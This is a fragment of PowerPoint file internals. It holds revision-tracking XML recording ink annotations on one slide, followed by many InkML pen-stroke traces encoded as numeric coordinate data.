          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="49" creationId="{F1017A64-E6BE-BE77-8B8F-330BFF65279C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="50" creationId="{EB82FEC3-179A-4FBF-4009-D96DEDC044FD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:56.721" v="4792"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="51" creationId="{5BB40C4C-A952-C448-8131-43B814FF9C00}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:56.721" v="4792"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="52" creationId="{BBE0A3AC-F1D5-68F8-1BEE-503CED9D3D6F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="55" creationId="{B6A9E2F5-1CB9-A1B0-3445-FA85E676DA5C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:08:58.813" v="4795"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="56" creationId="{5C56B972-9622-F500-0B61-B8ECE9849D2A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="58" creationId="{BAE530F9-8283-8BEA-E880-ABA6DD20FB28}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="59" creationId="{03E5E0B4-F2DD-BC1C-C9E5-52F80F6DEC39}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="60" creationId="{EDB60C14-A28E-DADD-1F1C-0FE24491943F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="61" creationId="{FF1B567F-15DC-AD9F-FA53-5ECE18E64C74}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="62" creationId="{FEBA2F84-ABFE-811E-2EF2-5E7B214C21B9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="63" creationId="{6CCA0B8F-6266-B0C2-2045-5FFDF23A2CBF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="64" creationId="{53B83FB8-AA41-81E4-AF77-C9C35AB45B8F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:05.194" v="4803" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="65" creationId="{99CC2BF9-CC01-BF12-8C15-83080C5B6D88}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:05.542" v="4804" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="66" creationId="{05BFBAC7-5B0B-865F-A743-095686A4C7A1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="67" creationId="{75124994-4A84-52C9-68DC-21B0AC78ED1D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:09:07.027" v="4807"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1491315966" sldId="278"/>
            <ac:inkMk id="68" creationId="{DDCEBA69-0491-5AFC-B304-F3CD1A33F31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36.774"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">697 0 24575,'-14'1'0,"-1"1"0,1 0 0,-1 1 0,1 0 0,0 1 0,0 1 0,1 0 0,-1 1 0,-14 9 0,15-9 0,-5 3 0,6-4 0,0 0 0,0 2 0,1-1 0,0 1 0,0 1 0,-10 9 0,7-3 0,4-4 0,1 0 0,-2-1 0,1 0 0,-1-1 0,0 0 0,-1-1 0,1 0 0,-2-1 0,-15 6 0,17-9 0,1 1 0,0 0 0,0 0 0,1 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,1 1 0,0 0 0,0 1 0,1 0 0,0 0 0,0 0 0,-6 10 0,-16 20 0,23-31 0,-1 0 0,1 1 0,1 0 0,-1 0 0,1 0 0,1 0 0,0 1 0,0 0 0,0 0 0,1 0 0,1 0 0,-3 11 0,1 9 0,-14 48 0,12-53 0,0-1 0,2 1 0,-3 37 0,6-30 0,4 133 0,-1-148 0,1-1 0,1 0 0,8 23 0,-6-24 0,-2-1 0,0 1 0,-1 0 0,3 21 0,-6-29 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,0 0 0,7 10 0,-2-6 0,1-1 0,0 0 0,0 0 0,1-1 0,15 9 0,112 86 0,-72-56 0,-42-28 0,43 24 0,1-10 0,1-2 0,1-4 0,119 29 0,-28-12 0,-92-25 0,94 11 0,-129-25 0,0-2 0,0-1 0,41-4 0,-67 2 0,0-1 0,0 1 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,7-5 0,47-35 0,-29 19 0,87-45 0,-112 64 0,0-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,0-1 0,-1-1 0,1 1 0,-2 0 0,1-1 0,2-9 0,0 4 0,0 1 0,12-20 0,13-26 0,-14 25 0,29-43 0,-30 53 0,-2-1 0,-1 0 0,0 0 0,11-35 0,6-15 0,-23 61 0,-1 1 0,0-2 0,-2 1 0,1-1 0,-2 1 0,5-29 0,-5 17 0,0 1 0,12-38 0,-9 41 0,-1 0 0,0-1 0,1-42 0,-5 8 0,-4-84 0,2 129 0,-2 0 0,1 0 0,-2 1 0,1-1 0,-8-13 0,-3-11 0,13 32 0,0 1 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-5 0 0,-4-2 0,0 2 0,0 0 0,-15-2 0,17 3 0,0 0 0,0 0 0,0-1 0,-16-6 0,13 3 6,0 1-1,0 0 0,-1 1 0,1 0 1,-1 1-1,-18-1 0,-81 4-180,48 1-1052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8.218"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 181 24575,'0'-1'0,"0"0"0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,34-4 0,-32 4 0,47-2 0,-34 2 0,0 0 0,0-1 0,0-1 0,-1-1 0,1 0 0,29-10 0,-33 6 0,1 0 0,-1-1 0,0-1 0,0 0 0,-1-1 0,15-15 0,30-24 0,-41 39-1365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9.923"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5 1 24575,'1'15'0,"1"1"0,1-1 0,1 0 0,0 0 0,1 0 0,8 18 0,2 8 0,5 15 0,40 134 0,-53-162 0,-2-11 0,0 0 0,-2 1 0,3 34 0,-5-30 0,2-1 0,1 1 0,9 32 0,-7-33 0,-1 0 0,-1 1 0,3 34 0,-8 227 0,1-279 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-7 5 0,0-2 0,0-1 0,0 1 0,-1-2 0,1 1 0,-1-2 0,-22 6 0,32-9 3,-1 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 0 1,-1 0-1,1 1 0,-1-1 0,1 0 0,-1-1 0,1 1 0,0 0 0,0 0 1,-1 0-1,1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0-2 1,-2-5-227,2 0 1,-1-1-1,2 1 1,-1 0 0,2-16-1,-1 23 77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0.628"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'0'41'0,"-1"-8"0,2-1 0,0 1 0,11 54 0,-6-51 0,-2-1 0,-1 1 0,-2-1 0,-4 38 0,1 6 0,2 400 0,0-476 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,3 3 0,0-2 0,0 0 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0 0,1-1 0,8 2 0,316 45 0,-254-38 0,-39-4 0,49 0 0,-2-7 0,67 2 0,-113 7 0,-32-6 0,1 0 0,0 0 0,0-1 0,-1 0 0,1 0 0,10-1 0,-15 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0-1 0,6-25-195,1 1 0,1 1 0,1-1 0,1 1 0,2 1 0,21-36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1.037"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'54'0,"3"0"0,24 106 0,-4-36 0,-21-97 0,2 0 0,1 0 0,1 0 0,15 29 0,-24-55 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,3-16 0,-3-25 0,-1 41 0,-1-136-1365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1.499"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 90 24575,'-1'-5'0,"1"-1"0,0 0 0,1 1 0,-1-1 0,1 1 0,0-1 0,1 0 0,-1 1 0,3-6 0,-2 9 0,-1 0 0,1-1 0,0 2 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 0,3 1 0,11 0 0,-1-1 0,0 2 0,0 0 0,0 1 0,0 1 0,0 0 0,0 2 0,-1-1 0,1 2 0,-1 0 0,17 10 0,-16-9 0,0 0 0,25 6 0,21 9 0,-31-9 0,-18-9 0,0 2 0,0 0 0,0 0 0,-1 1 0,0 1 0,0 0 0,13 12 0,-20-13 0,0 1 0,-1 0 0,0 0 0,0 0 0,-1 1 0,0-1 0,0 1 0,1 11 0,7 19 0,-1-10 0,-2 0 0,-2 0 0,0 1 0,-2 0 0,-1 0 0,-2 1 0,-4 53 0,2-76 0,0-1 0,-1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-1 1 0,-7 9 0,-11 25 0,10-8 0,9-25 0,0 0 0,0 1 0,0-2 0,-1 1 0,-8 11 0,11-17 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,-3-1 0,3 1-45,0-1-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0-1-1,1 1 1,-1 0-1,0-1 1,0 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,1-1 1,-1 0-1,1 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0-3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1.906"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">329 0 24575,'-1'9'0,"-1"0"0,0-1 0,0 1 0,-1-1 0,0 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,-8 9 0,-15 33 0,-15 65 0,27-73 0,2 2 0,2-1 0,-9 71 0,14-82 0,-13 44 0,6-28 0,9-31 0,2 1 0,0-1 0,1 27 0,1-28 0,0 1 0,-1 0 0,-1-1 0,-4 17 0,5-29 0,0 3 0,-1 0 0,0 0 0,0 0 0,-1-1 0,0 1 0,-3 5 0,6-10 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1 0,-1-2 0,-4-4 4,1-1 0,1 0 0,-1 0 0,1 0 0,1 0 0,-1-1 1,1 0-1,1 1 0,0-1 0,0 0 0,0-10 0,-1-14-139,5-58 1,0 30-1011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2.269"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'43'45'0,"-2"2"0,-2 2 0,38 62 0,-37-49 0,-10-18 0,42 85 0,-65-115 0,1 0 0,18 23 0,12 21 0,-23-29 0,-7-14 0,0 0 0,-1 1 0,0 0 0,5 22 0,-9-22 0,1 1 0,1-1 0,0-1 0,1 1 0,1-1 0,15 26 0,73 125 0,-92-162 0,1 1 0,0 0 0,-1 1 0,1 0 0,-1 0 0,0 0 0,3 12 0,-6-18 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-2 0 0,-24 0 0,8-2 8,1-1 0,0-1-1,0 0 1,-32-13-1,-61-37-193,47 21-1031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2.618"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 72 24575,'645'0'-1071,"-629"0"1083,0-1 0,0 0 1,0-2-1,20-4 0,-31 6-31,-1 0 1,1-1-1,-1 1 0,0-1 1,0 0-1,0 0 0,0 0 1,0-1-1,-1 1 0,1-1 1,-1 0-1,1 0 0,-1 0 1,0 0-1,0-1 1,0 1-1,-1-1 0,1 0 1,3-8-1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2.975"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'0'29'0,"1"1"0,1 0 0,8 42 0,-5-50 0,3 9 0,-1 1 0,-2 0 0,1 37 0,-8 28 0,4 69 0,8-109 0,-6-41 0,-1 0 0,1 24 0,-2-21 0,7 37 0,-5-37 0,3 39 0,-7-45 0,0-1 0,0 1 0,2 0 0,-1-1 0,2 1 0,0-1 0,0 1 0,1-1 0,1 0 0,0-1 0,7 14 0,1 1 0,-10-15 0,-3-10 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,-10-9 0,1 0 0,1-1 0,0-1 0,0 1 0,1-1 0,1-1 0,-9-20 0,11 24 0,-11-43 129,6 16-1623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3.345"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">152 0 24575,'1'4'0,"1"-1"0,-1 1 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,0 0 0,-1-1 0,7 5 0,6 8 0,16 18 0,1-2 0,2 0 0,43 29 0,-71-56 0,1 1 0,-1 0 0,0 0 0,0 1 0,-1 0 0,1-1 0,-1 2 0,0-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,-1 0 0,0 0 0,0 0 0,0 8 0,-1-3 0,1 2 0,-1 0 0,-1 0 0,0 0 0,-5 23 0,5-33 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,-7 3 0,-137 48 0,62-24 0,50-12 0,30-14 0,0 1 0,0-1 0,0 0 0,-1-1 0,0 0 0,-12 3 0,15-5-114,-1 1 1,0 0-1,0 0 0,1 0 0,-1 1 1,0 0-1,1-1 0,0 2 0,-1-1 1,1 0-1,-7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34.005"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 482 24575,'0'1038'-881,"11"-888"151,0-11 81,-13 64 300,4 102-20,9-203 380,1 32-229,-12-116 137,12 245-874,10-11 955,0 7 0,-11-83-474,-1-12 53,-2 94 421,1 4 0,27 335-382,-25-340-1386,0-4 610,-12 1950 1158,-10-1998 0,-1-3 0,13-82 0,-14 290 0,5-55-93,6-84 30,-8-168 459,-2 33 2514,13-55-1415,0-11-969,-15 126 0,4-58-58,9-93-212,-9 56 0,-4 54-218,6-33-235,2-46-59,4 78 0,3-81 114,-11 88 0,-2-21 142,9 198 0,5-173 0,-2 211 1659,2-355-1564,1 1-1,0-1 1,2 0 0,0 1 0,2-2-1,14 34 1,-9-25 32,-2 1-1,8 34 1,-9-16-127,-3 1 0,1 92 0,-9-47 0,4 138 0,9-174 0,-7-43 0,-1 1 0,2 25 0,8 71 0,-4-51 0,11 39 0,-13-76 0,-2 0 0,0 0 0,1 43 0,-8 23 0,4 81 0,-2-168 0,0 0 0,0 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 0 0,5 1 0,8 0 0,-1-1 0,0 0 0,1 0 0,-1-2 0,16-1 0,8-1 0,52 6-1916,172 28 0,-99-8 979,603 39-5866,-253-50 5471,-65-1-23,-24-1 457,1368-11 1077,-1470-10-179,-10 0 0,162 11 878,236 0 6301,-17 1-258,-655 1-7129,43 7-1,32 2-170,19 0 0,2 0-342,60 1 501,-79-3-23,139-8 1,-118-2 308,-109-1-66,46-7 0,-43 4 0,33-1 0,-37 4 0,33-7 0,-33 4 0,35-1 0,-25 2 507,0-1 0,-1-2 0,1-1 0,51-20 0,-66 20-507,1 1 0,0 1 0,0 1 0,0 1 0,1 1 0,27 0 0,-17 3 0,0-1 0,58-10 0,-35 6 0,-46 5 0,1 0 0,-1-1 0,0-1 0,0 0 0,0 0 0,12-4 0,-20 4 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,1-3 0,0-11 0,-1-1 0,-2-27 0,0 18 0,-1-668 0,5 373 0,-2 302 0,2 0 0,1 0 0,0 1 0,11-37 0,36-75 0,-29 82 0,13-53 0,21-71 0,42-235-629,-94 388 629,5-17 0,-2-1 0,2-60 0,-6 61-265,9-51 0,-3 27 91,11-69 174,-8 65 0,4-94 0,-2 17 0,-5 85 0,13-95 0,-13 86 0,-1 11 0,0-58 0,4-23-62,0 1 1,-11 69 61,12-94 0,-4 72-837,-5-172 1,-6 125 443,-8-68-186,0 7 624,-1 27-45,3 85 0,2 6 0,-8-187 0,16-782-501,-3 1017 940,-7-46 0,4 44-45,-1-35 1,5 29-379,0-19 82,-10-72 0,-21-120-98,12 109 106,10 85-73,-3-83 0,11 88-33,-3-1 0,-2 1 0,-14-51 0,15 77 0,-11-45 0,-12-95 0,21 115 0,-23-81 0,26 110 0,-11-32 10,7 27 93,-7-41 0,-49-263 252,20 100-46,37 188-288,-2-4-21,-15-84 0,-2 7 0,8 47 0,-57-238 0,37 174-283,-60-143 0,88 252 283,-2 0 0,2-1 0,1 0 0,-7-41 0,7 21 0,-3-1 0,-31-85 0,-56-92 0,10 23 0,64 144 0,-29-83 0,39 98 0,-3 1 0,-33-62 0,5 13 0,17 29-35,-87-170-397,107 215 412,0 0 1,1-1-1,1-1 0,-5-26 0,5 20 23,-21-53 0,-12 3-3,24 50 0,2-1 0,-21-59 0,23 52 0,-1 0 0,-25-43 0,32 67 0,-17-38-18,2-1 1,-28-100-1,40 122 464,-1 0-1,-24-45 1,-1 0-472,11 28 348,19 37-222,0 0 0,1 0 0,0 0 1,-4-14-1,5 15-61,0 1 1,0-1-1,-1 1 1,0-1 0,0 1-1,-1 1 1,0-1-1,-10-8 1,9 8 2,-1 0 0,2-1 0,-1 1 0,1-1 0,0-1 